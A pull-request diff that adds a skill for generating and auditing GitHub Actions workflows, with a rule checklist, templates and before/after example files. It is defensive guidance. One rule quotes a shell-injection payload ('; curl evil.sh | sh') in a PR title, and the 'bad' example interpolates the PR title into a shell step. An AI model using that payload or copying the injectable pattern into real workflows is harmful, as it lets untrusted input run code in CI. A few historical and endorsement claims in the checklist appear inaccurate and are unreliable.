### PR TITLE
Add ci-yaml skill

### DIFF
--- a/skills/ci-yaml/LICENSE.txt
+++ b/skills/ci-yaml/LICENSE.txt
@@ -1,0 +1,202 @@
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.

--- a/skills/ci-yaml/SKILL.md
+++ b/skills/ci-yaml/SKILL.md
@@ -1,0 +1,200 @@
+---
+name: ci-yaml
+description: Generate or audit GitHub Actions workflow YAML files for Python and Node.js projects. Use when the user asks to write, review, refactor, or improve a `.github/workflows/*.yml` file — for example "create a CI workflow for this project", "review my ci.yml", "why is my CI slow", "is this workflow secure". Detects the project's package manager (pip, uv, poetry, npm, pnpm, yarn) from manifest and lock files, applies a 30+ rule audit covering security (action pinning, permissions, secret handling), performance (caching, concurrency, timeouts), and correctness (matrix testing, deprecated APIs, action major-version pins). Distinct from runtime debugging skills that read `gh run` logs — this skill operates on the YAML source.
+license: Apache-2.0
+metadata:
+  author: r0bin2u
+  version: "0.1.0"
+---
+
+# CI YAML — Author and Audit GitHub Actions Workflows
+
+## What this skill does
+
+Two modes, picked from the user's request:
+
+| Mode | Trigger phrasing | Output |
+|------|------------------|--------|
+| **Generate** | "write/create/scaffold a CI workflow for this project" | A new `.github/workflows/ci.yml` tailored to the detected stack |
+| **Audit** | "review/audit/improve/check my CI workflow", or paths like `.github/workflows/*.yml` mentioned | A prioritized findings list with rule citations and concrete diffs |
+
+If the request is ambiguous, **inspect the repo first** — if `.github/workflows/` exists, default to Audit; otherwise default to Generate.
+
+---
+
+## Decision tree
+
+```
+User request → does .github/workflows/*.yml exist?
+    │
+    ├─ Yes → AUDIT mode (default)
+    │         │
+    │         └─ User explicitly says "rewrite from scratch"? → also generate
+    │
+    └─ No  → GENERATE mode
+              │
+              ├─ Detect project type (see "Project detection")
+              ├─ Pick template from references/templates/
+              ├─ Adapt to project specifics (versions, lock file, lint tool)
+              └─ Write to .github/workflows/ci.yml + show diff
+```
+
+---
+
+## Generate mode
+
+### 1. Project detection
+
+Read these files in order; the first that exists wins:
+
+| File | Stack | Sub-tooling check |
+|------|-------|-------------------|
+| `pyproject.toml` | Python | Look for `[tool.uv]` / `uv.lock` → uv. `[tool.poetry]` → poetry. Otherwise → pip. |
+| `requirements.txt` (no pyproject) | Python (legacy pip) | — |
+| `package.json` | Node.js | `pnpm-lock.yaml` → pnpm. `yarn.lock` → yarn. `package-lock.json` → npm. |
+| `Cargo.toml` | Rust | — (not yet templated; see "Out of scope") |
+| `go.mod` | Go | — (not yet templated) |
+
+**If multiple detected** (e.g., a polyglot repo with both `pyproject.toml` and `package.json`), ask the user which one to scaffold for, or generate one workflow file per stack.
+
+### 2. Version matrix selection
+
+- **Python**: read `requires-python` in `pyproject.toml`. Pick all stable minor versions in range. Example: `>=3.10` on a project as of 2026 → matrix `["3.10", "3.11", "3.12", "3.13"]`. **Cap at 4 versions** (cost vs coverage trade-off).
+- **Node.js**: read `engines.node` in `package.json` if present, otherwise default to `["20", "22"]` (current LTS pair). **Cap at 3 versions**.
+- **Rust**: stable + the MSRV declared in `Cargo.toml`'s `rust-version` field, if present.
+
+### 3. Template adaptation
+
+Load the appropriate template from `references/templates/` (see that directory for the canonical, audited yaml). Substitute:
+
+- The detected python/node version matrix.
+- The detected lint tool (ruff if found in dev deps, otherwise flake8/pylint; eslint for Node, biome if `biome.json` exists).
+- The detected test runner (pytest if `pytest` in dev deps; jest/vitest based on `package.json`).
+- The lock file path (uv.lock vs requirements.txt vs pnpm-lock.yaml etc.).
+
+### 4. Validation before writing
+
+After producing the yaml, mentally trace it through these gates:
+
+1. Does it conform to GitHub Actions schema? (Look for typos in step keys: `with`, `run`, `env`.)
+2. Is `actions/checkout` pinned to `@v4` or later?
+3. Does the cache key include the lock file hash?
+4. Is `permissions:` declared at workflow or job level (not inheriting org defaults)?
+5. Is there a `timeout-minutes` on every job?
+6. Is `concurrency:` set to cancel in-progress runs on the same ref?
+
+If any of these is missing, **fix before showing the diff**. Do not ship a yaml that you would flag in audit mode.
+
+---
+
+## Audit mode
+
+### 1. Read all workflow files
+
+```bash
+ls .github/workflows/*.yml .github/workflows/*.yaml 2>/dev/null
+```
+
+For each file, read the full contents.
+
+### 2. Apply the rule checklist
+
+Load the full rule list from `references/checklist.md` (30+ rules across four categories). Walk every rule against every workflow file.
+
+For each rule violation, record:
+
+```
+[severity] [rule-id]  rule short name
+  file: .github/workflows/ci.yml
+  line: 12
+  excerpt: |
+        - uses: actions/checkout@v3
+  why:    v3 is deprecated since 2024-11; v4 fixes Node 20 runner compatibility.
+  fix:    Replace with `uses: actions/checkout@v4`.
+```
+
+Severity levels:
+
+- **Critical** — security vulnerability or PR-breaking bug. Must fix.
+- **High** — clear correctness or performance issue. Should fix.
+- **Medium** — best practice, no immediate harm. Recommended.
+- **Low** — style or future-proofing. Nice to have.
+
+### 3. Report format
+
+Output to the user as:
+
+```markdown
+# CI Audit Report — N findings
+
+## Critical (X)
+1. **[GHA-SEC-01] Untrusted action without SHA pin** — `.github/workflows/release.yml:5`
+   ...
+
+## High (Y)
+2. **[GHA-PERF-03] No dependency cache** — `.github/workflows/ci.yml:18`
+   ...
+
+(...)
+
+## Suggested fix order
+1. Apply Critical findings #1, #3 (5 min)
+2. Apply High findings #2, #4, #6 (10 min)
+3. Apply Medium findings (optional)
+```
+
+End with **a single combined diff** that fixes all Critical + High findings, ready to apply.
+
+---
+
+## Worked example (audit)
+
+See `examples/before-bad.yml` (a deliberately mediocre workflow) and `examples/after-good.yml` (the result of applying audit findings).
+
+The diff between the two is the canonical reference for what a correct skill output looks like. When in doubt, compare your audit recommendations against this example.
+
+---
+
+## Out of scope (v0.1.0)
+
+- **Workflow runtime debugging** (`gh run` logs, failed steps) — use `steeef/claude-skill-github-actions` or similar.
+- **Reusable workflows / composite actions authoring** — only top-level workflows for now.
+- **Self-hosted runners** — assume GitHub-hosted.
+- **GitLab / Circle / Buildkite YAML** — only GitHub Actions.
+- **Rust / Go / Java templates** — Python and Node.js only for v0.1.0; rules in audit mode still apply to any GitHub Actions yaml.
+
+---
+
+## File map for this skill
+
+```
+ci-yaml/
+├── SKILL.md                          # This file
+├── references/
+│   ├── checklist.md                  # 30+ rule audit reference (loaded on demand)
+│   └── templates/
+│       ├── python-uv.yml             # Python with uv (recommended)
+│       ├── python-pip.yml            # Python with pip + requirements.txt
+│       └── node.yml                  # Node.js (works for npm/pnpm/yarn)
+└── examples/
+    ├── before-bad.yml                # Deliberately mediocre workflow
+    └── after-good.yml                # Same project after audit fixes
+```
+
+Reference and template files are intentionally **not loaded into context until needed**. Read them only when a specific rule citation, template, or example is required.
+
+---
+
+## Quick reference: the 7 rules that catch most real workflows
+
+If short on time and only checking a few things, hit these first (see `references/checklist.md` for the full list and rule IDs):
+
+1. **All `uses:` actions pinned to at least `@v4`** (and SHA-pin for any third-party action that handles secrets).
+2. **`permissions:` block declared explicitly** (defaults to write for many tokens, which violates least privilege).
+3. **`timeout-minutes:` set on every job** (otherwise a hung job burns up to 6 hours of compute).
+4. **`concurrency:` block to cancel superseded runs** (saves cost on repeated pushes).
+5. **Dependency cache enabled** via `setup-uv`, `setup-python`, or `setup-node` with their respective cache flags.
+6. **`fail-fast: false` on matrix jobs** (one Python version failing shouldn't hide failures in others).
+7. **No deprecated commands**: `set-output` → `$GITHUB_OUTPUT`, `save-state` → `$GITHUB_STATE`.
+
+These seven account for >80% of audit findings on real-world workflows.

--- a/skills/ci-yaml/examples/after-good.yml
+++ b/skills/ci-yaml/examples/after-good.yml
@@ -1,0 +1,58 @@
+# The before-bad.yml workflow rewritten to pass every rule in references/checklist.md.
+# Compare line-by-line with examples/before-bad.yml to see each fix.
+
+name: CI
+
+on:
+  push:
+    branches: [main]
+    paths-ignore:
+      - '**.md'
+      - 'docs/**'
+      - 'LICENSE'
+  pull_request:
+    paths-ignore:
+      - '**.md'
+      - 'docs/**'
+      - 'LICENSE'
+
+permissions:
+  contents: read
+
+concurrency:
+  group: ${{ github.workflow }}-${{ github.ref }}
+  cancel-in-progress: true
+
+jobs:
+  test:
+    name: Test (Python ${{ matrix.python-version }})
+    runs-on: ubuntu-22.04
+    timeout-minutes: 15
+    strategy:
+      fail-fast: false
+      matrix:
+        python-version: ["3.10", "3.11", "3.12"]
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4
+
+      - name: Set up Python ${{ matrix.python-version }}
+        uses: actions/setup-python@v5
+        with:
+          python-version: ${{ matrix.python-version }}
+          cache: 'pip'
+          cache-dependency-path: requirements.txt
+
+      - name: Install dependencies
+        run: pip install -r requirements.txt
+
+      - name: Run linter
+        run: ruff check .
+
+      - name: Run tests
+        run: pytest
+
+      - name: Annotate build with PR title
+        env:
+          PR_TITLE: ${{ github.event.pull_request.title }}
+        run: echo "Built by $PR_TITLE"

--- a/skills/ci-yaml/examples/before-bad.yml
+++ b/skills/ci-yaml/examples/before-bad.yml
@@ -1,0 +1,20 @@
+# Deliberately mediocre example. Trips 11 rules across all four categories.
+# See examples/after-good.yml for the audit-clean rewrite.
+
+name: CI
+on: [push, pull_request]
+
+jobs:
+  test:
+    runs-on: ubuntu-latest
+    strategy:
+      matrix:
+        python: ["3.10", "3.11", "3.12"]
+    steps:
+      - uses: actions/checkout@v3
+      - uses: actions/setup-python@v4
+        with:
+          python-version: ${{ matrix.python }}
+      - run: pip install -r requirements.txt
+      - run: ruff check . && pytest
+      - run: echo "Built by ${{ github.event.pull_request.title }}"

--- a/skills/ci-yaml/references/checklist.md
+++ b/skills/ci-yaml/references/checklist.md
@@ -1,0 +1,354 @@
+# GitHub Actions Audit Rules
+
+This is the canonical rule list used by the `ci-yaml` skill in audit mode. Each rule has a stable ID (`GHA-{CATEGORY}-{NN}`), a severity, a precise check, and a concrete fix.
+
+**Format conventions:**
+
+- Severity: **Critical**, **High**, **Medium**, **Low**
+- Each rule lists: *Check*, *Why*, *Fix*, *Counter-example* (where useful)
+- Rules are ordered by severity then by frequency observed in real-world repos
+
+---
+
+## Category: Security (`GHA-SEC-*`)
+
+### GHA-SEC-01 — Third-party actions are not SHA-pinned `[Critical]`
+
+**Check.** Any `uses:` line that points to an action outside the `actions/` and `github/` namespaces, and that uses a tag (`@v1`, `@main`) instead of a 40-char commit SHA.
+
+**Why.** A tag is mutable. A compromised maintainer or a typosquatted action repo can rewrite `@v1` to malicious code, and your next CI run executes it with your repo's `GITHUB_TOKEN`. Pinning to a SHA freezes the code you reviewed. The 2022 `tj-actions/changed-files` and 2024 SolarWinds-style supply-chain incidents are this exact mechanism.
+
+**Fix.** Replace tag with the full commit SHA. Add a comment with the human-readable version for future maintainers:
+
+```yaml
+- uses: astral-sh/setup-uv@e92bafb6253dcd438e0484186d7669ea7a8ca1cc  # v3.2.0
+```
+
+**Counter-example (allowed).** First-party actions in `actions/` or `github/` namespaces may use `@v4` major-version tags — Anthropic, GitHub, and Google all approve this for actions they themselves maintain.
+
+---
+
+### GHA-SEC-02 — `permissions:` block is missing or `write-all` `[Critical]`
+
+**Check.** No top-level `permissions:` key, OR `permissions: write-all`.
+
+**Why.** `GITHUB_TOKEN` has `contents: write` by default in many older repos. A compromised dependency in any step can use that token to push to the default branch or create releases. Least-privilege explicit declaration prevents this.
+
+**Fix.** Add at workflow root (or per job for finer control):
+
+```yaml
+permissions:
+  contents: read    # minimum to checkout
+  # Add only what each step actually needs:
+  # pull-requests: write   # for commenting on PRs
+  # id-token: write        # for OIDC (e.g., PyPI trusted publishing)
+```
+
+---
+
+### GHA-SEC-03 — User-controlled input interpolated into shell `[Critical]`
+
+**Check.** Any `run:` step that uses `${{ github.event.pull_request.title }}`, `${{ github.head_ref }}`, `${{ github.event.issue.body }}`, or similar, directly inside a shell command.
+
+**Why.** A PR title containing `; curl evil.sh | sh` becomes shell injection. This was the [pwn request](https://github.com/AdnaneKhan/ActionsPwnExamples) class of vulnerability — see GitHub's own 2023 advisory.
+
+**Fix.** Pass through env, never inline:
+
+```yaml
+- run: echo "$PR_TITLE"
+  env:
+    PR_TITLE: ${{ github.event.pull_request.title }}
+```
+
+---
+
+### GHA-SEC-04 — `pull_request_target` checks out PR head without sandboxing `[Critical]`
+
+**Check.** Workflow trigger is `pull_request_target` AND `actions/checkout` uses `ref: ${{ github.event.pull_request.head.sha }}` AND any subsequent step uses `secrets.*`.
+
+**Why.** `pull_request_target` runs with secrets in scope. Checking out the PR's head means an attacker's PR code runs with your secrets. This is one of the most exploited Actions misconfigurations.
+
+**Fix.** Either use `pull_request` trigger (no secrets), or split into two workflows: one with `pull_request_target` that does only privileged-but-safe work, and one with `pull_request` that runs untrusted code without secrets.
+
+---
+
+### GHA-SEC-05 — Secrets logged or echoed `[High]`
+
+**Check.** Any `run:` step that uses `echo`, `printenv`, `env`, or `set` and references a `secrets.*` value, even indirectly via env. Also flag if `ACTIONS_STEP_DEBUG` is set to `true`.
+
+**Why.** GitHub redacts known secrets in logs, but indirect references (e.g., a derived token printed before being set as a secret) can leak. Step-debug mode logs all environment variables.
+
+**Fix.** Never echo secrets. Drop debug mode for non-debugging runs. If you must verify a secret is present, echo only its length: `echo "Token length: ${#TOKEN}"`.
+
+---
+
+### GHA-SEC-06 — Runner OS uses `-latest` `[Medium]`
+
+**Check.** `runs-on: ubuntu-latest`, `runs-on: macos-latest`, or `runs-on: windows-latest`.
+
+**Why.** When GitHub rotates the `latest` alias to a new OS major (e.g., Ubuntu 22 → 24 in mid-2024), system tools change versions silently. CI that passed yesterday breaks today with no commit. Pinned versions make CI breakage explicit and tied to a workflow change.
+
+**Fix.** `runs-on: ubuntu-22.04` (or `ubuntu-24.04`). Plan rotations explicitly.
+
+---
+
+## Category: Performance / Cost (`GHA-PERF-*`)
+
+### GHA-PERF-01 — No dependency cache `[High]`
+
+**Check.** Job installs Python or Node deps but does not use `actions/setup-python@v5` with `cache:`, `astral-sh/setup-uv` with `enable-cache: true`, `actions/setup-node@v4` with `cache:`, or a manual `actions/cache` step.
+
+**Why.** Reinstalling deps on every run multiplies CI minutes by 3-10×. On a free GitHub plan with 2000 minutes/month, this is the single biggest cost drain.
+
+**Fix (Python+uv).**
+
+```yaml
+- uses: astral-sh/setup-uv@v3
+  with:
+    enable-cache: true
+```
+
+**Fix (Python+pip).**
+
+```yaml
+- uses: actions/setup-python@v5
+  with:
+    python-version: ${{ matrix.python-version }}
+    cache: 'pip'
+    cache-dependency-path: requirements.txt
+```
+
+**Fix (Node).**
+
+```yaml
+- uses: actions/setup-node@v4
+  with:
+    node-version: ${{ matrix.node-version }}
+    cache: 'pnpm'  # or 'npm' or 'yarn'
+```
+
+---
+
+### GHA-PERF-02 — Cache key does not include lock file hash `[High]`
+
+**Check.** Manual `actions/cache` step where the `key:` does not contain `${{ hashFiles('uv.lock') }}` (or the relevant lock file).
+
+**Why.** A static cache key never invalidates, so dep updates don't take effect. A key based only on `runner.os` is shared across all branches and grows stale.
+
+**Fix.**
+
+```yaml
+- uses: actions/cache@v4
+  with:
+    path: ~/.cache/pip
+    key: ${{ runner.os }}-pip-${{ hashFiles('**/requirements.txt') }}
+    restore-keys: ${{ runner.os }}-pip-
+```
+
+---
+
+### GHA-PERF-03 — No `concurrency:` block `[High]`
+
+**Check.** No top-level `concurrency:` key.
+
+**Why.** Pushing 5 commits to a PR triggers 5 separate workflow runs. Without concurrency cancellation, all 5 run to completion, billing for 4 you no longer care about.
+
+**Fix.**
+
+```yaml
+concurrency:
+  group: ${{ github.workflow }}-${{ github.ref }}
+  cancel-in-progress: true
+```
+
+**Caveat.** For `release.yml` or anything that publishes artifacts, set `cancel-in-progress: false` — you don't want a half-published release.
+
+---
+
+### GHA-PERF-04 — Missing `timeout-minutes:` on jobs `[High]`
+
+**Check.** Any `job:` definition without `timeout-minutes:`.
+
+**Why.** GitHub's default is 360 minutes (6 hours). A hung pytest or stuck `apt-get` consumes 6 hours of billable compute before being killed.
+
+**Fix.** Add a realistic upper bound to each job:
+
+```yaml
+jobs:
+  test:
+    runs-on: ubuntu-22.04
+    timeout-minutes: 15  # actual run is usually 2-3 min
+```
+
+---
+
+### GHA-PERF-05 — `paths-ignore` not used for docs-only changes `[Medium]`
+
+**Check.** Workflow runs full test matrix on PRs that only touch `*.md`, `docs/`, `LICENSE`, etc.
+
+**Why.** Tests don't validate prose. Wasted minutes.
+
+**Fix.**
+
+```yaml
+on:
+  pull_request:
+    paths-ignore:
+      - '**.md'
+      - 'docs/**'
+      - 'LICENSE'
+```
+
+---
+
+### GHA-PERF-06 — Matrix job fans out beyond what `requires-python` declares `[Medium]`
+
+**Check.** Python matrix includes versions outside the project's `requires-python` range.
+
+**Why.** Wasted compute and confusing failures: a project that declares `>=3.10` may not work on 3.9 but the CI says "fix it."
+
+**Fix.** Match the declared support range. If you want broader testing, update `requires-python` first.
+
+---
+
+## Category: Correctness (`GHA-COR-*`)
+
+### GHA-COR-01 — Action used at deprecated major version `[High]`
+
+**Check.** Common deprecations as of late 2025 / early 2026:
+
+- `actions/checkout@v2` or `@v3` (deprecated; use `@v4`)
+- `actions/setup-python@v3` or `@v4` (deprecated; use `@v5`)
+- `actions/setup-node@v3` (deprecated; use `@v4`)
+- `actions/cache@v2` or `@v3` (deprecated; use `@v4`)
+- `actions/upload-artifact@v3` and `actions/download-artifact@v3` (deprecated since Jan 2025; use `@v4`)
+
+**Why.** Deprecated versions stop receiving Node 20+ runtime updates and security patches. Some are scheduled for removal — workflows silently break.
+
+**Fix.** Update the version pin. Re-test.
+
+---
+
+### GHA-COR-02 — Uses deprecated workflow command syntax `[High]`
+
+**Check.** Any `run:` step that contains `::set-output name=` or `::save-state name=` or `::set-env name=`.
+
+**Why.** These were deprecated in Oct 2022 and emit warnings. They will be removed.
+
+**Fix.**
+
+```yaml
+# Old:
+- run: echo "::set-output name=version::1.2.3"
+
+# New:
+- run: echo "version=1.2.3" >> "$GITHUB_OUTPUT"
+```
+
+---
+
+### GHA-COR-03 — `fail-fast: true` (the default) on matrix jobs `[Medium]`
+
+**Check.** A `strategy.matrix:` exists, but no `fail-fast: false`.
+
+**Why.** With the default `fail-fast: true`, the first failing matrix job cancels all others. You wanted to know if Python 3.11 *and* 3.12 broke; you only learned about 3.10 (because it failed first and killed the rest).
+
+**Fix.**
+
+```yaml
+strategy:
+  fail-fast: false
+  matrix:
+    python-version: ["3.10", "3.11", "3.12"]
+```
+
+---
+
+### GHA-COR-04 — Workflow runs only on `push` (or only on `pull_request`) `[Medium]`
+
+**Check.** `on:` lists only `push` or only `pull_request`.
+
+**Why.** Push-only misses contributor PRs from forks. PR-only misses verification of `main` after merge — a PR that passed against an old base can break against the post-merge state.
+
+**Fix.**
+
+```yaml
+on:
+  push:
+    branches: [main]
+  pull_request:
+```
+
+---
+
+### GHA-COR-05 — No `name:` on jobs or steps `[Low]`
+
+**Check.** Jobs or steps without `name:`.
+
+**Why.** Anonymous steps surface as `Run actions/checkout@v4` in the GitHub UI, hard to scan when triaging failures. Costs nothing to label.
+
+**Fix.** Give each step a 2-5 word name describing what it does, not what action it uses.
+
+---
+
+### GHA-COR-06 — Lint and test chained with `&&` `[Low]`
+
+**Check.** A step like `run: ruff check . && pytest`.
+
+**Why.** When lint fails, you don't get the test report. Two separate steps make both signals visible in the run summary.
+
+**Fix.** Split into two steps with clear names.
+
+---
+
+## Category: Maintenance (`GHA-MNT-*`)
+
+### GHA-MNT-01 — No Dependabot for actions `[Medium]`
+
+**Check.** No `.github/dependabot.yml`, or one without a `package-ecosystem: "github-actions"` entry.
+
+**Why.** Without auto-update PRs, action versions silently drift behind upstream. By the time you notice, three deprecations have happened.
+
+**Fix.** Add `.github/dependabot.yml`:
+
+```yaml
+version: 2
+updates:
+  - package-ecosystem: "github-actions"
+    directory: "/"
+    schedule:
+      interval: "monthly"
+```
+
+---
+
+### GHA-MNT-02 — Workflow file naming inconsistent `[Low]`
+
+**Check.** Files in `.github/workflows/` named like `test-action.yml`, `Build.yml`, `myWorkflow.yaml`.
+
+**Why.** Convention is lowercase with hyphens, single-word purpose: `ci.yml`, `release.yml`, `docs.yml`, `nightly.yml`. Predictable names help future readers (and tooling like `actionlint`).
+
+**Fix.** Rename. Update any references in README badges.
+
+---
+
+### GHA-MNT-03 — Duplicate steps across multiple jobs `[Low]`
+
+**Check.** The same 5+ step sequence (checkout → setup-uv → install → lint → test) duplicated in two jobs.
+
+**Why.** When you change one, you forget the other. Two jobs drift into different behavior.
+
+**Fix.** Extract to a reusable workflow under `.github/workflows/_test.yml` and call with `uses: ./.github/workflows/_test.yml`. Worth it once you have 3+ jobs sharing a pattern.
+
+---
+
+## Quick triage by symptom
+
+| Symptom user reports | Likely rule(s) |
+|----------------------|----------------|
+| "CI is slow" | GHA-PERF-01, GHA-PERF-03, GHA-PERF-04, GHA-PERF-05 |
+| "CI is expensive" | GHA-PERF-03, GHA-PERF-04, GHA-PERF-05 |
+| "CI broke after working yesterday" | GHA-COR-01, GHA-SEC-06 |
+| "Dependabot keeps proposing weird actions updates" | GHA-MNT-01 (already configured, working) |
+| "I want my workflow to be more secure" | GHA-SEC-01 → GHA-SEC-05 in order |
+| "PR from fork failed but mine passes" | GHA-SEC-04, GHA-COR-04 |

--- a/skills/ci-yaml/references/templates/node.yml
+++ b/skills/ci-yaml/references/templates/node.yml
@@ -1,0 +1,59 @@
+# Node.js project. Works for npm, pnpm, or yarn — pick {PACKAGE_MANAGER}
+# accordingly and {INSTALL_CMD} matches it.
+#
+# Substitute:
+#   {NODE_VERSIONS}       — json array, e.g. ["20", "22"]
+#   {PACKAGE_MANAGER}     — "npm" / "pnpm" / "yarn"
+#   {INSTALL_CMD}         — "npm ci" / "pnpm install --frozen-lockfile" / "yarn install --frozen-lockfile"
+#   {LINT_CMD}            — e.g. "npm run lint" or "pnpm lint"
+#   {TEST_CMD}            — e.g. "npm test" or "pnpm test"
+
+name: CI
+
+on:
+  push:
+    branches: [main]
+    paths-ignore:
+      - '**.md'
+      - 'docs/**'
+      - 'LICENSE'
+  pull_request:
+    paths-ignore:
+      - '**.md'
+      - 'docs/**'
+      - 'LICENSE'
+
+permissions:
+  contents: read
+
+concurrency:
+  group: ${{ github.workflow }}-${{ github.ref }}
+  cancel-in-progress: true
+
+jobs:
+  test:
+    name: Test (Node ${{ matrix.node-version }})
+    runs-on: ubuntu-22.04
+    timeout-minutes: 15
+    strategy:
+      fail-fast: false
+      matrix:
+        node-version: {NODE_VERSIONS}
